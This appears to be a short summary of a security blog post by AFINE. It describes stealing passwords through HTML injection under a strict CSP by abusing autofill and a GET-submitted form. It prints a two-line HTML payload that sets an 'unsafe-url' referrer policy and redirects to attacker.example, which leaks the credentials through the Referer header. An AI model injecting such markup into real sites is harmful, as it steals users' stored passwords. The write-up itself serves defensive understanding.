Password theft via HTML injection under a strict CSP

AFINE analyzed an attack on an authentication page protected by a strict CSP. Scripts, styles, images, and external requests were blocked, making classic XSS impossible. However, HTML injection was still available.

The attacker injects a form containing email and password fields. The browser's password manager autofills them with the victim's stored credentials. When the user submits the form, the credentials are sent via a GET request to the legitimate application and become part of the URL.

The remaining challenge is exfiltration. Since CSP blocks direct requests to external domains, the attack abuses the Referer header. The injected HTML sets a permissive referrer policy and immediately redirects the victim to an attacker-controlled site:

<meta name="referrer" content="unsafe-url">
<meta http-equiv="Refresh" content="0;url=https://attacker.example">

As a result, the browser follows the redirect and includes the full URL of the previous page in the Referer header. Since that URL contains the victim's credentials, they are disclosed to the attacker.

📎 Source: https://afine.com/blogs/stealing-passwords-via-html-injection-under-a-strict-csp